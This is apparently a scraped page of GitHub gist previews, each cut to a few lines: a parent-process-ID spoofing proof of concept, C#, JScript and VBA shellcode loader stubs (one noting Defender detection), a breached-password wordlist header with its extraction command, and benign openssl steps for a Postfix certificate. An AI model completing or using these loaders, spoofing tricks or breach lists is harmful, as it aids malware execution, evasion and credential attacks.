David dmcxblue
reb311ion
/ adopter.cpp
Last active
September 1, 2024 02:59
PoC for parent process ID spoofing (PPID).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <tchar.h> | |
| #include <windows.h> | |
| #include <iostream> | |
| #include <string> | |
| BOOL AdjustCurrentProcessToken(void) | |
| { | |
| HANDLE hToken; | |
| TOKEN_PRIVILEGES sTP; |
0xhexmex
/ sc_launcher_norwx.cs
Last active
May 24, 2023 23:58
C# shellcode launcher without using RWX memory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Execute shellcode without using RWX memory | |
| // Will get caught by Defender as-is | |
| // Compile: C:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:sclaunch-norwx.exe /unsafe /platform:x86 .\sc_launcher_norwx.cs | |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace ShellCodeLauncher | |
| { |
ahvonenj
/ breachcompilation.txt
Created
January 23, 2019 14:37
1.4 billion password breach compilation wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wordlist created from original 41G stash via: | |
| grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
| Then, compressed with: | |
| 7z a breachcompilation.txt.7z breachcompilation.txt | |
| Size: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Option Explicit | |
| Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr | |
| Private Declare Function IsBadWritePtr Lib "kernel32" _ | |
| (ByVal lp As Long, ByVal ucb As Long) As Long | |
| Private Declare Function VirtualProtect Lib "kernel32" _ | |
| (ByVal lpAddress As Long, ByVal dwSize As Long, _ | |
| ByVal flNewProtect As Long, lpflOldProtect As Long) As Long | |
| Private Declare Function VirtualAlloc Lib "kernel32" _ | |
| (ByVal lpAddress As Long, ByVal dwSize As Long, _ |
volure
/ SSH: Self Sign Postfix
Last active
October 25, 2024 21:10
Create a Self Signed Postfix Certificate
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # copied from https://www.e-rave.nl/create-a-self-signed-ssl-key-for-postfix | |
| openssl genrsa -des3 -out mail.domain.tld.key 2048 | |
| chmod 600 mail.domain.tld.key | |
| openssl req -new -key mail.domain.tld.key -out mail.domain.tld.csr | |
| openssl x509 -req -days 365 -in mail.domain.tld.csr -signkey mail.domain.tld.key -out mail.domain.tld.crt | |
| openssl rsa -in mail.domain.tld.key -out mail.domain.tld.key.nopass | |
| mv mail.domain.tld.key.nopass mail.domain.tld.key | |
| openssl req -new -x509 -extensions v3_ca -keyout cakey.pem -out cacert.pem -days 3650 | |
| chmod 600 mail.domain.tld.key |